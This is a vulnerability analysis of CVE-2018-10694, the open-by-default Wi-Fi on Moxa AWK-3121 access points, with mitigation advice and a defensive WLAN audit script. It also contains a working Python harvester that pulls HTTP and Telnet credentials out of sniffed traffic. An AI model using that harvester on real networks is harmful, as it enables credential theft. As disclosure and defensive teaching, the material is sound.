CVE-2018-10694 in AWK-3121
Summary
by MITRE
An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also, an attacker can MITM the response and infect a user's computer very easily.
Analysis
by VulDB Data Team • 09/28/2023
CVE-2018-10694 affects Moxa AWK-3121 industrial wireless access points running firmware 1.14. In the factory configuration the Wi-Fi interface comes up as an open network: no link-layer authentication and no encryption until an administrator configures them. The weakness is therefore not a bug in one parser or handler but an insecure default. Every frame exchanged between an administrator's computer and the access point during initial setup can be captured, and altered, by anyone within radio range.
The weakness sits at the link layer but its consequences are felt at the application layer. It maps to CWE-310 (Cryptographic Issues) and, more precisely, to CWE-319 (Cleartext Transmission of Sensitive Information): nothing is stored in the clear, it is sent in the clear. Without WPA2-Personal or WPA2-Enterprise on the link, an attacker needs only a wireless card in monitor mode to record everything the administrator's computer sends to the device, and because the device's management protocols, HTTP and Telnet, add no encryption of their own, credentials and session contents are readable directly from the capture. Guidance such as NIST SP 800-153 (Guidelines for Securing Wireless Local Area Networks) recommends WPA2 with AES-CCMP for exactly this reason; shipping an open SSID by default runs counter to it.
The operational impact is severe and requires little skill. Passively, an attacker records HTTP requests to the web interface and Telnet sessions, both of which carry the administrator's credentials in cleartext (MITRE ATT&CK T1040, Network Sniffing); those credentials then grant full management access to the device (T1078, Valid Accounts). Actively, the same attacker can answer in place of the device or the administrator (T1557, Adversary-in-the-Middle): responses from the web interface can be replaced with pages that deliver malware to the administrator's workstation, and bytes in a Telnet session can be altered or supplemented so that the device executes commands the administrator never typed. Telnet offers no integrity protection, so the device cannot tell injected commands from genuine ones, which makes full compromise of the access point a realistic outcome.
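To make the passive half of this concrete, here is an added example (not code from the VulDB analysis, from MITRE, or from Moxa) of what a listener on the open WLAN can pull out of a capture. The capture itself is constructed inline: the host address, URL path, account name and password are placeholders. The HTTP extractor handles both a Basic Authorization header and a urlencoded login form; the Telnet extractor strips RFC 854 option negotiation and uses the server's prompts to decide what the client's next line means, since the username is echoed but the password is not.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample of what a passive listener on the open WLAN sees. Each
# tuple is (protocol, sender, payload). Host, path, account and password are
# placeholders for this example, not values taken from the device.
_PW = "s3cret-example"
_FORM_BODY = f"username=admin&password={_PW}".encode()
_BASIC = base64.b64encode(f"admin:{_PW}".encode()).decode()
CAPTURE = [
    ("http", "client",
     b"POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n"
     + f"Authorization: Basic {_BASIC}\r\n".encode()
     + b"Content-Type: application/x-www-form-urlencoded\r\n"
     + f"Content-Length: {len(_FORM_BODY)}\r\n\r\n".encode() + _FORM_BODY),
    ("http", "server", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    # Telnet: IAC WILL ECHO / IAC WILL SUPPRESS-GO-AHEAD are interleaved with
    # the prompt; the server echoes the username but not the password.
    ("telnet", "server", b"\xff\xfb\x01\xff\xfb\x03\r\nlogin: "),
    ("telnet", "client", b"\xff\xfd\x01\xff\xfd\x03admin\r\n"),
    ("telnet", "server", b"admin\r\nPassword: "),
    ("telnet", "client", _PW.encode() + b"\r\n"),
    ("telnet", "server", b"\r\n# "),
]

IAC, SB, SE = 0xFF, 0xFA, 0xF0
USER_FIELDS = {"username", "user", "login", "name"}
PASS_FIELDS = {"password", "pass", "passwd", "pwd"}


def strip_telnet_iac(data: bytes) -> bytes:
    """Remove RFC 854 option-negotiation sequences, leaving only the bytes a
    person would see on screen or type at the keyboard."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
        elif i + 1 >= len(data):          # truncated command at end of segment
            break
        elif data[i + 1] == IAC:          # IAC IAC is an escaped data byte
            out.append(IAC)
            i += 2
        elif data[i + 1] == SB:           # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif 0xFB <= data[i + 1] <= 0xFE:  # WILL/WONT/DO/DONT carry an option
            i += 3
        else:                             # NOP, GA and other two-byte commands
            i += 2
    return bytes(out)


def http_credentials(request: bytes) -> list[tuple[str, str, str]]:
    """Return (source, username, password) triples found in one cleartext
    HTTP request: a Basic Authorization header and/or a urlencoded form."""
    found = []
    head, _, body = request.partition(b"\r\n\r\n")
    m = re.search(rb"(?im)^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", head)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
            user, _, pw = decoded.decode("utf-8", "replace").partition(":")
            found.append(("http-basic", user, pw))
        except ValueError:                # malformed base64: ignore the header
            pass
    form = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    users = [v for k, vs in form.items() if k.lower() in USER_FIELDS for v in vs]
    pws = [v for k, vs in form.items() if k.lower() in PASS_FIELDS for v in vs]
    if users and pws:
        found.append(("http-form", users[0], pws[0]))
    return found


def telnet_logins(stream: list[tuple[str, bytes]]) -> list[tuple[str, str, str]]:
    """Reconstruct logins from an ordered list of (sender, payload): the
    server's prompt decides how the client's next line is interpreted."""
    logins, expecting, user, buf = [], None, None, b""
    for sender, raw in stream:
        text = strip_telnet_iac(raw)
        if sender == "server":
            prompt = text.lower().rstrip()
            if prompt.endswith(b"login:"):
                expecting, buf = "user", b""
            elif prompt.endswith(b"password:"):
                expecting, buf = "pass", b""
            continue
        buf += text
        if expecting and b"\n" in buf:
            line, _, buf = buf.partition(b"\n")
            value = line.rstrip(b"\r").decode("utf-8", "replace")
            if expecting == "user":
                user = value
            else:
                logins.append(("telnet", user or "", value))
                user = None
            expecting = None
    return logins


def harvest(capture) -> list[tuple[str, str, str]]:
    """Run both extractors over a capture and return every credential found."""
    creds = []
    for proto, sender, payload in capture:
        if proto == "http" and sender == "client":
            creds.extend(http_credentials(payload))
    creds.extend(telnet_logins([(s, p) for proto, s, p in capture if proto == "telnet"]))
    return creds


if __name__ == "__main__":
    for source, user, pw in harvest(CAPTURE):
        print(f"{source:10s} user={user!r} password={pw!r}")
```

Against real traffic the same two functions would be fed the reassembled TCP payloads of port 80 and port 23 flows from a monitor-mode capture; on an open network no key is needed to get that far, which is the whole point of the finding.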
Mitigation has an immediate part and a structural part. Immediately, the device must not be operated on its open default SSID: perform initial configuration over a wired connection, enable WPA2-Enterprise (802.1X) or, where that is not available, WPA2-Personal with a strong passphrase before the radio carries any management traffic, and change every default credential at deployment. Link-layer encryption alone is not enough for the management plane: with WPA2-Personal, any holder of the shared key who has captured a client's four-way handshake can still decrypt that client's traffic, so HTTP and Telnet should be disabled in favour of HTTPS and SSH, and administrative access restricted to those channels. Structurally, wireless access points serving industrial control equipment should sit in their own segment, reachable from engineering workstations only through the paths they need, in line with the least-privilege and boundary-protection controls in NIST SP 800-53. Periodic audits should confirm that no SSID in the plant is open or WEP-protected and that no management interface still answers on HTTP or Telnet, and wireless monitoring should detect unauthorised or misconfigured access points. The issue is a reminder that secure-by-design means secure defaults, and that configuration management of the kind ISO/IEC 27001 expects has to include the settings devices ship with.
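The audit step above can be scripted. The following is an added example (not from the VulDB analysis or from Moxa) that classifies every BSS in the output of `iw dev <iface> scan` and fails anything that is open, WEP, WPA1-only or still advertising TKIP. The scan text is constructed here, with made-up BSSIDs and SSIDs, to stand in for a real scan; the parser relies only on the `BSS`, `SSID:`, `capability:`, `RSN:`/`WPA:` and `* Pairwise ciphers:` / `* Authentication suites:` lines that `iw` prints.

```python
import re
import sys
from dataclasses import dataclass, field

# Constructed sample in the layout of `iw dev <iface> scan` output. BSSIDs
# and SSIDs are made up; the last entry is there to exercise the TKIP path.
SCAN_OUTPUT = """\
BSS 02:00:00:00:00:01(on wlan0)
\tSSID: plant-ap-1
\tcapability: ESS ShortSlotTime (0x0401)
BSS 02:00:00:00:00:02(on wlan0)
\tSSID: plant-ap-2
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: PSK
BSS 02:00:00:00:00:03(on wlan0)
\tSSID: legacy-ap
\tcapability: ESS Privacy ShortSlotTime (0x0411)
BSS 02:00:00:00:00:04(on wlan0)
\tSSID: corp-ap
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: IEEE 802.1X
BSS 02:00:00:00:00:05(on wlan0)
\tSSID: mixed-ap
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tRSN:\t * Version: 1
\t\t * Group cipher: TKIP
\t\t * Pairwise ciphers: TKIP CCMP
\t\t * Authentication suites: PSK
"""


@dataclass
class Bss:
    bssid: str
    ssid: str = ""
    privacy: bool = False          # Privacy bit in the capability field
    rsn: bool = False              # RSN (WPA2/WPA3) information element seen
    wpa1: bool = False             # vendor WPA (WPA1) element seen
    ciphers: list = field(default_factory=list)
    akms: list = field(default_factory=list)


def parse_iw_scan(text: str) -> list[Bss]:
    """Parse the subset of `iw ... scan` output needed to judge encryption."""
    nets, cur, section = [], None, None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = Bss(m.group(1))
            nets.append(cur)
            section = None
            continue
        if cur is None:
            continue
        s = line.strip()
        if not s.startswith("*"):      # any non-bullet line ends an RSN/WPA block
            section = None
        if s.startswith("SSID:"):
            cur.ssid = s[5:].strip()
        elif s.startswith("capability:"):
            cur.privacy = "Privacy" in s
        elif s.startswith("RSN:"):
            cur.rsn, section = True, "rsn"
        elif s.startswith("WPA:"):
            cur.wpa1, section = True, "wpa"
        elif s.startswith("*") and section:
            key, _, val = s.lstrip("* ").partition(":")
            if key == "Pairwise ciphers":
                cur.ciphers += val.split()
            elif key == "Authentication suites":
                cur.akms.append(val.strip())
    return nets


def assess(bss: Bss) -> tuple[str, str]:
    """Return (verdict, reason). Only WPA2/WPA3 with CCMP/GCMP passes."""
    if not bss.privacy and not bss.rsn and not bss.wpa1:
        return ("FAIL", "open network: no encryption at all")
    if not bss.rsn and not bss.wpa1:
        return ("FAIL", "WEP: broken legacy encryption")
    if bss.wpa1 and not bss.rsn:
        return ("FAIL", "WPA1 (TKIP) only: deprecated")
    if "TKIP" in bss.ciphers:
        return ("WARN", "RSN network still allows the TKIP pairwise cipher")
    akm = " ".join(bss.akms)
    if "SAE" in akm:
        return ("PASS", "WPA3-Personal (SAE)")
    if "802.1X" in akm:
        return ("PASS", "WPA2/WPA3-Enterprise (IEEE 802.1X)")
    if "PSK" in akm:
        return ("PASS", "WPA2-Personal (PSK): still use HTTPS/SSH, key holders can decrypt each other")
    return ("WARN", f"RSN with unrecognised AKM: {akm or 'none'}")


def audit(text: str) -> dict[str, tuple[str, str]]:
    """Map each SSID in a scan to its verdict."""
    return {b.ssid: assess(b) for b in parse_iw_scan(text)}


if __name__ == "__main__":
    # Usage: sudo iw dev wlan0 scan | python3 wlan_audit.py
    text = SCAN_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for ssid, (verdict, reason) in audit(text).items():
        print(f"{verdict:4s} {ssid!r}: {reason}")
```

An AWK-3121 left in its default state shows up like `plant-ap-1` here: no Privacy bit, no RSN element, and a FAIL verdict. The script is deliberately strict about the Privacy bit on its own, since a BSS with Privacy set but no RSN or WPA element can only be WEP.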